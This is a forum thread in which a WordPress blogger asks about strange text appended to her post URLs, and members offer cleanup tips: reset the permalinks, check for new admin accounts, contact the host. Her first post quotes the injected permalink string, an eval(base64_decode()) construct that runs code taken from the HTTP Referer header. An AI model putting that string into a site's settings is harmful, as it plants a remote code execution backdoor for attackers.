Hey Warriors!
Someone just notified me (and it's true) that whenever you go to my tiffanydow blog (I won't post the link but google it if you want or PM me), if you hover over or click on any of the individual posts, it has a string of weird text tacked on. I have NO clue why it's suddenly started doing this...it looks like this: /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFER ER%5D))%7D%7D|.+)&%/ (that's the part tacked on after the domain.com/article-title/ part). What in the world is this? tiff |

Hey Tiff,
I found this: WordPress › Support Question About Possible Hack of Site The folks there seem to think it's a hack attempt. |

What was the permalink for the blog? Maybe you have something screwed up there? (/%postname%/what comes here?)

Someone told me to return to default on permalinks and I did...and it seems to be working., But if it was a hack, what else can I do besides change the password?

I fixed the permalink structure. One of the sources you gave me said to check for new administrators and I don't have any so hopefully this is the end of that. Craig said he'd ride in on a white horse and help me after his coaching call. Tech idiots like me need a knight in shining armor. lol | |

If your site was hacked, it may not be through wordpress, but through your hosting.
Happened to me, and at first I thought my Wordpress was hacked, but it turned out the hacking was through my hosting account. Hostgator took care of deleting the malicious code from all of my sites. Good luck with dealing with this. Robyn |

Hey Tiff, here's plugin to check on your security setting .. http://semperfiwebdesign.com/custom-...security-scan/
BTW, you can read all about permalink within your admin > setting > permalink. But if you have All In One SEO plugin, just go to the option / setup page of this plugin. |

Whenever something weird happens, do a quick backup of your blog first. Then contact your host and they'll often be able to help you.
I had a problem few days ago which made my single pages to be blank. I contacted my host and they solved it. |

Hope it all gets fixed quickly! Craig Desorcy has helped me tremendously, as well. You're in good hands.
